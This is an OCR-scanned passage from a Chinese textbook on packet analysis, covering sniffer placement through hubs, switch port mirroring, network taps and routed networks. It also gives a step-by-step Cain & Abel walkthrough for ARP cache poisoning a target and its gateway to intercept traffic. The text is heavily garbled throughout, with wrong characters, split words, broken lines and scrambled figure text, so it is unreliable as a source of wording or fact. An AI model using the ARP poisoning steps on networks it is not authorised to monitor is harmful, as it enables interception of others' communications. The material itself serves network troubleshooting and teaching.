进行 明 信 ， 当 两 个 或 多 个 设备 同时 通信 有 时， 数据 包 束 会 产生 冲突 位 撞 ， 
如 图 2-3 所 示 。 结 东 可 能 是 丢 包 ， 然 后 通信 设备 需要 承 有 党 重新 传输 数据 
包 所 市 来 的 性 能 损失 ， 而 这 叉 增 加 了 网 络 拥 压 和 础 播 。 当 通信 沉 量 水 平 
和 生 撞 概 率 增 加 时 ， 设 备 需 要 传输 每 个 数据 包 3 次 其 全 4 次 ， 这 大 大 降低 
本 网 络 性 能 。 因 此 很 容易 理解 为 什么 现在 各 种 规模 的 网 络 部 已 经 转 而 使 
用 交换 机 了 了。 虽然 在 现代 网 络 中 你 很 难 再 全 到 集 线 磺 了 ， 但 在 一 些 文 持 
老 旧 或 特殊 设备 的 网 络 里 ， 比 如 工业 控制 系统 〈ICS) 网络 中 ， 你 仍 有 
可 能 过 人 到 它们 。 


计算 机 人 
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图 2-2 ”在 集 线 右 网 络 中 咒 探 将 提供 一 个 不 受 限制 的 可 视 范 围 


传输 计算 机 传输 计算 机 


局 bl Ba 
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es 
集线器 
图 2-3” 当 集线器 网 络 上 两 个 设备 在 同一 时 间 通 信 时 产生 的 碰 揪 


要 准 列 一 个 网 络 中 是 否 有 集 线 郁 ， 一 个 简单 的 方法 融 是 去 机 房 观 友 
网 络 机 柜 。 当 你 认 不 出 来 的 时 候 ， 只 需 在 服务 占 机 框 最 黑暗 的 角 沙 寻 找 
网 络 人 硬件 ， 并 且 上 和 面 有 一 些 积 灰 。 


2.3 ”在 交换 式 网 络 中 进行 咒 探 


正如 第 1 革 中 所 讨论 的 ， 交 换 机 是 现在 网 络 坏 境 中 一 种 常见 的 连接 
设备 类 型 。 它 们 为 通过 广播、 早 播 与 组 播 方式 传输 数据 提供 了 融 效 的 方 
法 。 另 外 ， 一 些 交换 机 还 允许 全 双 工 通信 ， 也 残 是 说 ， 设 备 可 以 同时 发 
运 和 接收 数据 。 


而 这 对 数据 包 分 析 师 来 说 是 不 洱 的 ， 交 换 机 给 数据 包 咒 探 市 来 了 一 
些 复 来 因 系 。 当 将 咒 探 右 连 接 到 交换 机 上 的 一 个 是 口 时 ， 你 将 只 能 看 到 
广播 数据 包 ， 及 由 你 目 己 电 脑 传输 与 接收 的 数据 包 ， 如 图 2-4 所 示 。 
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图 2-4 交换 式 网 络 上 的 可 视 范 围 仅 限于 你 所 接 入 的 器 口 


在 一 个 交换 式 网 络 中 从 一 个 目标 设备 捕获 网 络 流量 的 基本 方法 有 如 
下 4 种 : 并 口 镜像 、 集 线 器 接 出 (hubbing out) 、 使 用 网 络 分 流 器 和 
ARP 绥 人 存 污染 攻击 。 


2.3.1 疹 口 镜 俐 


纹 口 镜像 也 许 是 在 交换 式 网 络 中 捕获 一 个 目标 设备 所 有 网 络 通 信和 最 
简单 的 方法 了 。 为 了 使 用 问 口 镜像 ， 你 必须 能 够 通过 命令 行 焉 Web 管 理 
界面 来 访问 目标 设备 所 连接 的 交换 机 。 此 外 ， 这 个 交换 机 还 必须 支持 剖 
口 镜 像 的 功能 ， 并 且 有 一 个 空闲 的 器 口 ， 让 你 可 以 插入 你 的 嗅 探 夏 。 


要 启用 端口 镜像 ， 你 需要 发 出 一 个 命令 ， 来 强制 交换 机 将 一 个 端口 
上 的 所 有 通信 都 镜像 到 另 一 端口 上 。 例 如 ， 为 了 捕获 交换 机 3 号 端口 连 
接 的 一 台 设备 发 出 的 所 有 流量 ， 你 只 需要 简单 地 将 你 的 嗅 探 分 析 器 接 入 
4 号 端口 ， 然 后 将 3 号 端口 镜像 复制 到 4 号 端口 ， 这 就 可 以 让 你 看 到 目标 
设备 所 传输 与 接收 的 所 有 网 络 流量 了 。 图 2-5 显 示 了 端口 镜像 的 原理 。 


计算 机 D 
计算 机 B 的 端口 被 镜像 计算 机 A ] 


复制 到 了 了 嗅 探 器 病 口 
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计算 机 E 计算 机 F 


计算 机 B 


计算 机 C 
图 2-5 ”端口 镜像 可 以 让 你 在 交换 式 网 络 上 扩大 可 视 范围 
设置 闹 口 锐 像 的 具体 方法 取决 于 不 同 的 交换 机 制造 商 。 对 于 大 多 数 


的 交换 机 ， 你 需要 倒 录 到 命 信行 界面 ， Fsbo 
在 表 2-1 中 找到 一 些 通 用 的 响 口 镜像 命 


表 2-1 用 于 局 用 并 口 镜像 的 命令 


四 "> 
set span <source port> <destination port> 
set port mirroring create <source port> <destination port> 


port-mirroring mode mirror-port <source port> monitor-port <destination port> 





东 些 交换 机 提供 基于 Web 的 图 形 用 户 管理 界面 ， 并 提供 站 口 镜像 作为 一 个 选项 ， 但 这 种 
号 置 方式 个 像 命令 行 那么 普通 和 标准 。 但 征 ， 如 打 你 的 交换 机 所 做 了 一 种 图 形 化 界面 ， 可 以 
局 效 配 置 端 口 锐 像 的 万 法 ， 那 么 你 也 可 以 使 用 。 际 此 之 外 ， 越 来 越 多 的 小 型 办 公 和 家 性 办 公 
(SOHO) 交换 机 开始 提供 出 口 锐 像 功能 ， 并 且 这 些 功 能 通常 可 以 在 图 形 化 界面 里 设置 。 





在 进行 端口 镜像 时 ， 需 要 留意 被 镜像 端口 的 流量 负载 。 有 些 交 换 机 
厂商 允 许 你 将 多 个 端口 的 流量 镜像 到 一 个 单独 端口 上 ， 这 在 分 析 一 个 交 
换 机 上 两 个 或 多 个 设备 的 网 络 通信 时 ， 可 能 是 非常 有 用 的 。 然 而 ， 这 是 
我 们 使 用 一 些 简单 的 算术 来 考虑 会 用 生 什么 事情 。 比 如 你 有 一 个 24 端 口 
交换 机 ， 你 将 23 个 全 双 工 的 100Mbit/s 端 口 流量 都 镜像 到 一 个 端口 上 ， 那 
么 在 这 个 端口 上 可 能 会 有 4600Mbits 的 流量 。 由 于 这 将 会 远 远 超出 一 个 
单独 端口 的 物理 承受 能 力 ， 因 此 在 网 络 流量 达到 一 定 级 别 后 ， 将 可 能 会 
导致 数据 包 丢 失 ， 甚 至 网 络 速度 变 慑 。 在 这 种 情况 下 ， 交 换 机 会 丢弃 所 
有 多 余 的 数据 包 ， 或 者 甚至 “暂停 >? 内 部 交换 电路 ， 从 而 造成 通信 中 断 的 
情况 。 当 你 开始 执行 你 的 数据 包 捕 获 时 ， 请 务必 小 心 ， 不 要 让 这 种 情况 
在 你 的 网 络 中 发 生 。 


在 企业 网 络 或 有 持续 网 络 流量 安全 监控 需求 的 场景 里 ， 珊 口 锐 像 功 
能 看 起 来 是 一 个 吸引 人 的 、 低 成 本 的 解决 方案。 但是， 该 方案 对 于 一 些 
应 用 通 蜗 并 不 靠 诺 。 特 别 是 在 高 吞吐 量 级 别 的 环境 下 ， 冰 口 镜像 可 能 会 
产生 不 稳定 的 结 素 ， 并 且 造 成 无 法 奶 踩 的 数据 丢 矢 。 对 于 这 种 情况 ， 我 
建议 你 使 用 分 流 左 ， 详 见 2.3.3 小 下。 


2.3.2 ”集线器 输出 


为 一 种 在 交换 式 网 络 中 捕获 目标 设备 通信 流量 的 方式 是 集 线 此 输 
出 。 便 用 这 种 拉 巧 ， 你 需要 将 目标 设备 和 分 析 系 统 分 段 到 同一 网 络 段 
中 ， 然 后 把 它们 直接 桶 入 到 一 个 集 线 规 上 。 


许多 人 认为 集线器 输出 根本 就 是 一 种 作 浆 方法 ， 不 过 ， 它 在 你 不 能 
进行 端口 镜像 但 仍 对 目标 设备 接 入 的 交换 机 有 着 物理 访问 的 时 候 ， 真 的 
是 一 个 完美 的 解决 方案 。 为 了 进行 集线器 输出 ， 你 所 需要 的 就 是 一 个 集 
线 器 和 几 根 网 线 。 在 你 找 齐 了 硬件 之 后 ， 承 可 以 按照 如 下 操作 步骤 进行 
连接 了 。 

(1) 找到 目标 设备 所 连接 的 交换 机 ， 并 将 目标 设备 连接 网 线 从 区 
换 机 上 拔 掉 。 

(2) 将 目标 设备 的 网 线 插入 到 你 的 集线器 上 。 


(3) 使 用 万 一 根 网线 ， 将 你 的 趾 探 分 析 需 也 连接 到 集 线 春 上 。 


(4) 从 你 的 集 线 故 连接 一 根 网 线 到 交换 机 上 ， 将 集 线 问 连接 a 到 网 


-一 oO 


现在 你 已 经 将 目标 设备 和 你 的 咒 探 分 析 上 莫 连 接 到 了 同一 个 广播 域 
中 ， 所 有 从 你 的 目标 设备 流入 流出 的 网 络 流量 部 将 在 集 线 如 中 广播 ， 从 
而 让 你 的 咒 探 分 析 帮 可 以 捕获 到 这 些 数 据 包 ， 如 图 2-6 所 示 。 
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可 视 范 围 
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计算 机 E 计算 机 F 


计算 机 C 
图 2-6 ”将 你 的 目标 设备 通过 集 线 占 输出 ， 与 喂 探 分 析 帮 连接 在 一 起 
在 大 多 数 情况 下 ， 集 线 器 输出 会 将 目标 设备 的 全 双 工 变 成 半 双 工 。 
尽管 这 种 方法 并 不 是 进行 网 络 线路 监听 最 彻底 的 方法 ， 但 在 交换 机 不 支 
持 端 口 镜像 时 它 可 能 是 你 唯一 的 选择 。 但 是 ， 请 记 住 的 是 ， 你 的 集线器 
同样 需要 一 个 电源 线 连 接 ， 而 某 些 情况 下 你 却 很 难 找到 。 


| 注 喜 本 时 时 时 时 时 


作为 友情 提示 ， 在 拔 掉 用 户 的 设备 时 ， 你 应 该 事先 给 他 一 个 善意 的 提醒 ， 否 则 如 果 碰 巧 
这 位 用 户 是 公司 CEO， 你 就 惨 了 。 





找到 “只 正 的 > 案 线 硼 














2.3.3 ”使 用 网 络 分 流 融 


大 家 部 和 若 志 这 名 谚语 :“ 有 牛排 可 以 虑 的 时 候 ， 为 什么 要 选择 鸡肉 
呢 ? ”( 或 者 是 美国 南方 的 谚语 ,，“ 有 有 人 炸 脂 肠 吃 的 时 候 ， 为 什么 要 选择 火 
0 


网 络 分 流 大 是 一 个 便 件 设备 ， 你 可 以 将 它 放置 在 网 络 布线 系统 的 两 
个 珊 扣 之 间 ， 来 捕获 这 两 个 端点 之 则 的 数据 包 。 与 集 线 带 输出 类 似 ， 在 
网 络 上 放置 一 个 硬件 ， 就 可 以 捕获 你 所 需要 的 数据 包 。 所 不 同 的 是 ， 这 
RE 


网 络 分 流 器 又 分 为 2 种 基本 类 型 : 聚合 的 和 非 聚 合 的 。 这 两 种 分 泊 
锅 部 是 安置 在 两 个 设备 之 间 ， 来 咒 探 所 有 流 经 的 网 络 退 信 有 的 。 他 们 之 间 
根本 的 区 列 在 于 : 非 聚 合 的 网 络 分 流 苍 有 4 个 站 口 ， 如 图 2-7 所 示 ， 而 缘 
合 分 流 硕 则 只 有 3 个 刀 口 。 





图 2-7 ”一 于 Barracuda 的 非 聚合 网 络 分 流 器 


网 络 分 流 硕 通 第 还 需要 一 个 电源 连 搂 ， 但 也 有 一 些 是 市 电池 的 ， 它 
们 不 需要 插入 电源 插座 束 可 以 进行 短暂 的 数据 包 咀 


全 < 


探 。 
1. 聚合 有 的 网 络 分 流 融 


聚合 的 网 络 分 法 占 的 使 用 方法 古 较 简单 的 。 它 只 有 一 个 物理 的 流量 
监听 口 ， 来 对 双 同 通信 进行 噢 探 。 


为 了 使 用 聚合 的 网 络 分 法纪 来 捕获 接 入 交换 机 的 单 台 计 算 机 的 所 有 


流量 ， 你 只 珊 要 按照 如 下 步 又 进行 操作 。 
(1) 从 交换 机 上 拔 下 目标 计算 机 的 网 线 。 
(2) 将 连接 目标 计算 机 网 线 的 万 一 是 捅 入 到 网 络 分 流 硕 的 in” 闯 口 
(3) 将 万 一 根 网 线 的 一 病 插 入 到 网 络 分 激 磺 的 “oue 病 口 ， 并 将 万 
一 中 插入 到 网 络 交 换 机 。 


(4) 将 最 后 一 根 网 线 的 一 病 打 入 网 络 分 流 右 的 “Monitor” 病 口 ， 并 
将 男 一 闹 打 入 到 你 作为 咒 探 右 使 用 的 电脑 上 。 


聚合 网 络 分 法 费 的 连接 应 该 如 图 2-8 所 示 的 那样 ， 一 旦 连 好 之 后 ， 
你 的 嗅 探 左 了 吏 能 够 捕获 到 你 接 入 网 络 分 流 药 的 所 有 网 络 流量 。 


聚合 网 络 分 流 楷 





mmm 


嗅 探 串 


图 2-8 ”使 用 聚合 的 网 络 分 流 器 来 嗅 探 网 络 流量 
2. 非 聚 合 有 的 网 络 分 流 顶 


非 肾 合 的 网 络 分 流 帮 比 起 聚合 的 各 人 微 复 来 一 些 ， 但 它 在 进行 流量 捕 
获 时 有 痢 更 好 的 灵活 性 。 与 聚合 网 络 分 激 器 仅仅 只 有 一 个 监听 端口 来 咖 
探 双 同 通 信 沉 量 个 同 的 是 ， 非 聚合 的 网 络 分 流 瘟 有 看 两 个 监听 病 口 。 一 
个 监 昕 端口 用 来 唱 探 流出 方 回 的 网 络 流量 (从 电脑 连接 到 分 流 问 的 方 
问 ) ， 为 一 个 监 昕 疾 口 用 来 喂 探 流入 方 同 的 网 络 流量 《从 分 流 可 逆 口 到 
电脑 的 方向 ) 。 


为 了 捕获 连接 交换 机 的 计算 机 的 所 有 网 络 流量 ， 你 则 需要 按照 如 下 
步骤 进行 配置 。 


(1) 从 交换 机 上 拔 下 计算 机 连接 网 线 。 


(2) 将 网 线 的 一 端 插入 计算 机 ， 为 一 端 插 入 到 网 络 分 流 妖 的 “in” 曾 
加 二 


(3) 将 太一 根 网 线 的 一 是 插入 到 网 络 分 流 带 的 “out” 闹 口 ， 然 后 将 
为 一 姗 插入 到 网 络 交 换 机 上 。 


(4) 将 第 三 根 网 线 插入 到 网 络 分流 絮 的 “Monitor A” 六 口 ， 并 将 男 
一 器 插 入 到 你 作为 嗅 探 需 使 用 电脑 的 一 块 网 卡 接口 上 。 


(5) 将 最 后 一 根 网 线 插 入 到 网 络 分 流 亏 的 “Monitor B2? 痕 口 ， 并 将 
男 一 病 插 入 到 你 作为 咒 探 右 使 用 电脑 的 第 二 块 网 卡 接 口上 。 


非 聚合 网 络 分 流民 的 连接 方式 如 图 2-9 所 示 。 
非 聚合 网 络 分 流 器 





er 


限 探 器 


图 2-9 ”使 用 非 聚 合 的 网 络 分 流 器 来 咒 探 网 络 流量 


里 然 以 上 的 例子 容易 让 你 产生 一 种 错觉 ， 束 好 像 你 只 能 使 用 分 流 帮 
监 昕 一 从 设备 ， 但 实际 上 你 可 以 通过 合理 的 规划 ， 把 分 流 副 放 症 在 合适 
的 位 置 ， 将 其 用 来 捕获 多 台 设 备 的 沉 量 。 例 如 ， 如 果 想 在 因特网 上 监听 
两 个 网 络 之 间 的 流量 ， 你 需要 将 集 线 左 串联 在 所 有 设备 相连 的 交换 机 和 
网 络 上 层 路 由 需 之 间 。 这 样 的 放置 方式 可 以 让 你 收集 到 所 有 你 力 要 的 这 
量 。 这 种 全 略 党 第 在 安全 监控 中 用 到 。 


3. 选择 一 球 网 络 分 流 顶 


网 络 分 流露 拥有 两 种 不 同 的 类 型 ， 那 么 哪 种 会 更 好 一 些 昵 ? 在 大 多 
数 情况 下 ， 聚 合 的 网 络 分 流 价 是 自选 ， 因 为 它们 和 需要 较 少 的 网 线 ， 同 时 
在 虽 探 器 计算 机 上 也 不 需要 两 块 网 卡 。 然 而 ， 在 你 需要 捕获 高 币 客 的 流 
量 ， 或 古 只 需要 关注 一 个 方 同上 的 流量 时 ， 非 聚合 的 网 络 分 流 右 会 更 加 
适用 。 

你 可 以 购买 到 各 种 规格 的 网 络 分 流 右 ， 从 简 早 的 大 概 150 美 元 左右 
驶 能 买 到 的 以 太 网 分 流 医 ， 到 需要 数 万 美元 的 企业 级 光纤 分 流 硕 。 我 曾 
经 使 用 过 Net Optics 和 Barracuda 网 络 的 网 络 分 流 促 ， 先 得 它们 的 产品 都 
非常 不 错 。 我 骤 肯 定 ， 市 面 上 还 有 很 多 其 他 非常 不 错 的 选择 。 


2.3.4 ARP 绥 存 污染 


进行 网 络 线路 监听 时 我 最 喜欢 的 技术 ， 束 是 ARP 绥 存 污 染 。 我 们 将 
在 第 6 章 中 详细 介绍 ARP 协 议 ， 但 在 这 里 会 进行 一 个 简要 的 解释 ， 以 大 
助 了 解 这 种 技术 是 如 何 工 作 的 。 


1. ARP 查 询 过 程 


在 第 1 章 里 ， 我 们 介绍 了 OSI 参考 模型 中 在 第 2 层 与 第 3 层 上 数据 包 寻 
址 的 两 种 主要 方式 。 这 些 第 2 层 地 址 ， 或 称 为 MAC 地 址 ， 无 论 你 在 使 用 
哪 种 第 3 层 寻 址 方案 ， 都 会 与 之 协同 工作 。 


在 本 书 中 ， 按 照 行业 标准 术语 ， 我 们 将 第 3 层 寻 址 方案 称 为 IP 寻 址 
系统 。 网 络 上 的 所 有 设备 相互 通信 时 在 第 3 层 上 均 使 用 IP 地 址 。 由 于 区 
换 机 在 OSI 模 型 的 第 2 屋 上 工作 ， 它 们 只 识别 第 2 屋 上 的 MAC 地 址 ， 因 此 
网 络 设备 必须 在 它们 创建 的 数据 包 中 包含 这 些 信 息 。 当 这 些 设备 在 不 知 
道 通 信 对 方 的 MAC 地 址 时 ， 必 须要 通过 已 知 的 第 3 层 耻 地 址 来 进行 查 
询 ， 这 样 才 可 能 通过 交换 机 将 流量 传递 给 相应 的 设备 。 


这 些 翻译 过 程 束 是 通过 第 2 层 上 的 ARP 协 议 来 实施 的 。 连 接 到 以 太 
网 网 络 上 计算 机 的 ARP 查 询 过 程 ， 是 从 一 台 计 算 机 想 要 与 男 一 台 进 行 通 
信 时 开始 的 。 发 起 通信 的 计算 机 首先 检查 目 己 的 ARP 绥 存 ， 奏 看 它 是 合 
已 经 有 对 方 卫 地 址 对 应 的 MAC 地 址 。 


如 果 不 存 在 ， 它 将 往 数据 链 路 层 广播 地 址 FF:FF:FF:FF:FF 发 送 一 个 
ARP 广 播 请 求 包 ， 作 为 一 个 广播 数据 包 ， 它 会 极 这 个 特定 的 以 太 网 广播 
域 上 的 每 台 计 算 机 接收 ， 这 个 请 求 包 问 道 :“ 某 某 IP 地 址 的 MAC 地 址 是 
A 


没有 匹配 到 目标 卫 地 址 的 计算 机 会 价 单 地 选择 丢弃 这 个 请 求 包 。 而 
目标 计算 机 则 选择 答复 这 个 数据 包 ， 通 过 ARP 应 答 告 知 它 的 MAC 地 
址 。 此 时 ， 发 起 通信 的 计算 机 束 获 取 到 了 数据 链 路 层 的 寻 址 信息 ， 便 可 
以 利用 它 与 远 端 计算 机 进行 通信 ， 同 时 将 这 些 信息 保存 在 ARP 绥 存 中 ， 
来 加 速 以 后 的 网 络 访 问 。 


2. ARP 绥 存 污染 是 如 何 工 作 的 


ARP 缓 存 污 染 ， 有 时 也 被 称 为 ARP 其 骗 ， 是 一 种 在 交换 网 络 中 监听 


流量 的 噩 级 方法 。 这 种 方法 通过 友 送 包含 虚 假 MAC 地 址 (第 二 层 ) 的 
ARP 消 息 ， 来 支持 其 他 计算 机 的 流量 。 图 2-10 显 示 了 ARP 绥 存 污 染 的 具 
体 过 程 。 

中 毒 后 的 ARP 缓 存 


Target Computer 





图 2-10 ARP 缓存 污染 允许 你 拦截 目标 计算 机 的 流量 


ARP 绥 存 污染 是 一 种 在 交换 式 网 络 中 进行 监听 的 高 级 拉 术 。 它 通 妾 
由 攻击 者 使 用 ， 癌 客户 站 系统 友 达 虚 假 地 址 的 数据 包 ， 来 截获 特定 的 网 
络 流量 ， 或 者 对 目标 进行 拒绝 服务 攻击 (DoS) 。 然 而 ， 它 也 可 以 是 一 
种 在 交换 去 网 络 中 捕获 目标 系统 数据 包 的 方法 。 


3， 使 用 Cain & Abel 软 件 


当 试 图 进行 ARP 绥 存 污染 时 ， 第 一 步 你 需要 获得 一 些 必要 的 工具 来 
搜集 相关 信息 。 在 我 们 的 演示 中 ， 我 们 将 使 用 一 蒜 流 行 的 安全 工具 Cain 
& Abel， 可 以 从 oxid.it 下 载 获 得 。 这 款 软 件 也 支持 Windows 系 统 。 你 可 
以 根据 网 站 上 的 指引 ， 来 下 载 和 安装 这 球 软 件 。 


EE 








当 你 试图 去 下 载 这 球 软 件 的 时 候 ， 计 算 机 的 杀毒 软件 或 浏览 右 有 可 能 会 把 Cain & Abel 误 








报 为 恶意 或 黑客 工具 。 该 工具 有 多 种 用 途 ， 包 括 一 些 可 能 锐 认 为 是 狮 沪 的 。 但 在 这 里 ， 这 球 
工具 对 你 的 系统 没有 威胁 。 





在 使 用 Cain & Abel 软 件 之 前 ， 你 需要 收集 某 些 信 息 ， 包 括 咒 探 分 析 
器 系统 的 IP 地 址 ， 你 所 希望 嗅 探 网 络 流 量 的 远程 计算 机 的 IP 地 址 ， 以 及 
远程 计算 机 所 连接 的 上 游 路 由 器 。 


当 第 一 次 打开 Cain & Abel 软 件 时 ， 你 会 友 现 在 软件 徊 口 的 项 器 有 看 
一 系列 的 标 人 多 页 (ARP 绥 存 污 染 攻 击 只 是 强大 的 Cain & Abel 软 件 的 其 中 
一 个 功能 ) 。 为 了 演示 例子 ， 我 们 将 切换 到 “ 品 探 间 ” 选 项 页 上 。 当 单 击 
此 选项 卡 时 ， 你 应 该 会 看 到 一 个 空 表 ， 如 图 2-11 所 示 。 











图 2-11 ”Cain & Abel 软 件 主 窗口 中 的 “ 串 探 器 ”选项 卡 


要 完成 此 表 ， 你 需要 油 活 这 球 软 件 的 内 置 咒 探 费 ， 扫 插 你 的 网 络 并 
找 出 活跃 主机 。 请 控 以 下 步 缀 进行 操作 以 完成 上 述 目 标 。 


(1) 蛙 击 工具 栏 上 左 起 第 二 个 图 标 ， 类 似 网 卡 形状 的 那个 。 


(2) 你 会 被 要 求 选择 你 布 望 进行 嗅 探 的 网 络 搁 口 。 这 个 接口 应 说 
连接 到 你 所 布 望 进行 ARP 绥 存 污染 的 网 络 。 选 择 这 个 网 络 接 口 ， 然 后 扣 
击 OK 按 钮 。《〈 要 确保 按 下 这 个 按钮 ， 以 激活 Cain & Abel 软 件 内 臣 的 虽 


人 < 口 量 


探 器 。 ) 


(3) 要 建立 在 你 的 网 络 上 可 用 主机 的 列表 ， 单 击 加 号 〈+) 图 标 。 
MAC 地 址 扫 摘 需 对 话 框 将 会 出 现 ， 如 图 2-12 所 示 。 请 选择 “All hosts in 
my subnet” 圆 形 按钮 〈 或 者 选择 特定 的 地 址 范围 ) ， 单 击 OK 继 续 。 


MAC Address ScanmmeEr 


Target 


te Bl hosts in mw subnet 
f ”Pange 


From 
| 


To 
a 


Promscuous-hiode Scanner 
ARP Test [Broadcast 31-bil) 
[ ARP Test [Broadcast 16-bit] 
[ ARP Test [Broadcast 8-bit] 
[RP Test [Group bi 

[ ARP Test [hulticast group O) 
[ ARP Test [hiulticast group 1) 
[ARP Test [hiulticast group 3) 
[ Al Tests 


Cancel 





图 2-12 ”Cain & Abel 网 络 发 现 工具 

一 些 Windows 10 用 户 报告 Cain & Abel 无 法 确定 他 们 的 网 络 接口 的 IP 
地 址 ， 因 此 无 法 完成 这 个 过 程 。 如 果 您 有 这 个 问题 ， 那 么 在 配置 网 络 接 
口 时 ， 您 将 看 到 接口 的 IP 地 址 是 0.0.0.0。 

为 此 ， 采 取 以 下 步骤 解决 。 

(1) 如 果 Cain & Abel 是 打开 的 ， 请 关闭 它 。 

(2) 在 桌面 搜索 栏 输入 ncpa.cpl， 打 开 网 络 连接 对 话 框 。 

(3) 右键 单 击 要 嗅 探 的 网 络 界面 ， 并 单 击 Properties。 

(4) 双击 Internet Protocol Version 4 (TCP/IPv4) 。 

(5) 单 击 Advanced 按 钮 并 选择 DNS 选项 卡 。 


(6) 选择 Use this connection” s DNS suffix in DNS registration 劳 边 


的 复 选 框 来 激活 它 。 
(7) 单 击 OK 退 出 打开 的 对 话 框 ， 重 新 局 动 Cain & Abel。 


现在 表格 中 应 该 填 满 了 你 所 在 网 络 中 的 所 有 主机 的 信息 ， 包 括 它 们 
的 MAC 地 址 、IP 地 址 和 供应 了 两 信息 等 。 这 是 你 开始 进行 ARP 绥 存 污 染 的 
目标 主机 列表 。 


在 程序 窗口 的 底部 ， 你 应 该 会 看 到 男 一 组 选项 卡 ， 选 择 它们 将 带 你 
到 嗅 探 器 标题 下 的 其 他 窗口 。 现 在 ， 你 已 经 创建 了 主机 列表 ， 接 下 来 可 
以 单 击 ARP 选 项 卡 切换 至 ARP 窗 口中 。 


在 ARP 窗 口中 ， 你 会 看 到 两 个 空 的 表格 。 当 你 完成 下 面 的 操作 步 又 
之 后 ， 上 方 的 表格 中 将 显示 出 你 的 ARP 缓 存 污染 过 程 涉及 的 设备 列表 ， 
而 下 方 表格 则 会 显示 出 在 你 进行 中 毒 攻击 的 计算 机 之 间 的 所 有 通信 内 
容 。 


进行 ARP 组 存 污染 攻击 ， 请 按照 下 列 步 又 进行 操作 。 


(1) 在 屏幕 上 方 的 空白 区 域 中 单 击 ， 然 后 单 击 程序 标准 工具 栏 中 
的 加 号 (+) 图 标 。 


(2) 出 现 的 单 窗 口中 会 有 两 个 选择 栏 。 在 元 人 出， 你 可 以 看 到 网 络 
上 的 所 有 活跃 主机 的 列表 。 单 击 你 希 诅 进行 网 络 流量 嗅 探 的 目标 系统 卫 
地 址 ， 右 按 的 选择 栏 中 将 会 显示 出 网 络 中 的 所 有 主机 列表 ， 除 了 你 所 选 
择 的 目标 主机 卫 地 址 。 


(3) 在 右边 的 选择 栏 中 ， 单 击 目标 计算 机 的 直接 上 游 路 由 二 〈 即 
网 关 ) 卫 地 址 ， 如 图 2-13 所 示 ， 然 后 单 击 “OK”。 这 两 个 设备 的 下地 址 现 
在 应 该 会 被 显示 在 主 程序 窗口 上 方 的 表格 中 。 


New ARP Peison Routing 


PR enables you to hiack IP traffis between the selected host on the left list and all selected hosts on the right list in both 
directions. If a selected host has routing capabilities wish traffic wll be Intercsepted as well. Please note that since your 
machine has nat the same periormance of a router vou could cause Dosd ff you et BPR between your Default Gateway and 
all other hosts on your LaN. 


IP address 
COCICOT7S8CES .1B.1E. 4CBEODE S00038, 
10C37BS537F10 .1B.1E. ?831C1CBB256 
183C5DB7DB31 .16B.1E. 40490FDFADSS5 
CCFE5C7BECIC .1B.1E. C4B301BLI563 
DOD4a0F2C0B5 .1B.1E. 0025B 3BE S254 
D0025B .3BE S254 .1B.1E. 000420F2C0B5 
C4B301BCL3563 .1B.1E. CCFS5C7BBCIC 
40490FDFADSS .1B.1E. 10C37B537F10 
?831C1CBB256 
4CBDDESO003, 

区 





图 2-13 ”选择 你 要 启用 ARP 组 存 污 染 的 目标 系统 


(4) 完成 这 个 过 程 的 最 后 一 步 ， 单 击 标准 工具 芒 中 黄 黑 相同 的 辐 
射 符 号 ， 这 个 操作 将 激活 Cain & Abel 软 件 的 ARP 绥 存 污染 功能 。 让 你 的 
咒 探 分 析 冀 作为 从 目标 系统 到 它 的 上 游 路 由 强 之 间 所 有 通信 的 中 间 和 人 。 


你 现在 应 该 就 能 局 动 你 的 数据 包 唱 探 顷 ， 并 开始 分 析 过 程 了 。 当 你 
完成 流量 捕 葡 之后， 只 需 册 次 里 击 贡 黑 相间 的 辐 册 图 标 ， 便 可 以 停止 
ARP 绥 存 污染 过 程 。 


4. 天 于 ARP 绥 存 污 染 的 警示 


作为 ARP 绥 和 存 污染 过 程 的 最 后 警示 ， 你 必须 要 非常 清楚 实施 这 个 过 
程 中 每 个 系统 的 角色 与 作用 。 在 目标 设备 拥有 很 融 的 网 络 利 用 流量 时 ， 
比如 说 一 台 有 着 1Gbit/s 联 网 线路 的 文件 服务 大 ， 不 要 使 用 这 项 技术 (万 
其 当 你 的 别 探 分 析 系 统 只 提供 了 一 条 100Mbits 的 链 路 ) 。 


当 你 使 用 这 个 例子 中 涛 示 的 这 项 技术 对 网 络 流量 进行 单 路 由 时 ， 所 
有 日 标 系统 肥 壕 和 接收 的 流量 部 必须 先 通 过 你 的 咒 探 分 析 系 统 ， 因 此 ， 
你 的 嗅 探 分 析 系 统 可 能 成 为 整个 通信 过 程 中 的 瓶颈 。 这 种 流量 重 路 由 会 
对 你 进行 分 析 的 系统 造成 一 种 拒绝 服务 攻击 却 的 影响 ， 将 导致 网 络 性 能 
下 降 以 及 分 析 数 据 不 完备 。 








2.4 在 路 由 网 络 环境 中 进行 嗅 探 


所 有 在 交换 式 网 络 中 用 来 监听 网 络 线路 的 技术 在 路 由 网 络 环境 中 都 
癌 样 适用 。 面 对 路 由 网 络 环境 时 ， 唯 一 珊 要 重点 考 碟 的 问题 是 ， 当 你 调 
试 一 个 涉及 多 个 网 络 分 段 的 故 隐 时， 如何 安 妆 你 的 别 探 钥 ? 正如 你 所 学 
到 的 ， 一 个 设备 的 广播 域 一 下 延伸 ， 直 到 到 达 一 个 路 由 规 ， 在 这 个 操 
上 ， 网 络 流量 将 会 朴 转 上 友 给 上 洲 路 由 耸 。 


在 网 络 数据 必须 经 过 多 个 路 由 占 的 情况 下 ， 在 各 个 路 由 如 上 分 析 网 
络 流量 是 非常 重要 的 。 举 例 来 说 ， 考 碟 你 很 可 能 会 过 到 的 一 个 场景 ， 在 
网 络 中 由 几 个 路 由 此 将 几 个 网 络 分 段 连 接 在 一 起 。 在 这 个 网 络 中 ， 每 个 
网 段 与 上 游 网 段 进 行 通信 ， 来 获取 和 存储 数据 。 


如 图 2-14 所 示 ， 我 们 要 解决 的 一 个 故障 问题 ， 一 个 下 游子 网 D， 无 
法 与 网 络 A 中 的 任何 设备 进行 通信 。 


如 由 在 存在 故障 问题 的 网 络 DD 中 咒 探 流量 ， 你 可 以 清 杷 地 看 到 数据 
包 和 被 传输 到 了 其 他 网 段 ， 但 你 可 能 看 不 到 回来 的 数据 包 所 说 的 “一 会 儿 
加 来”。 如 琳 你 重新 知 夸 你 的 嗅 探 郁 部 普 位 置 ， 在 网 络 D 的 直接 上 六 网 段 
(网 络 B)〉 中 开始 咒 探 ， 那 么 你 将 会 有 一 个 关于 故障 更 清晰 的 视图 。 


此 时 ， 你 可 能 会 发 现 ， 来 自 网 络 D 的 流量 被 丢 寞 了 ， 或 是 被 网 络 B 
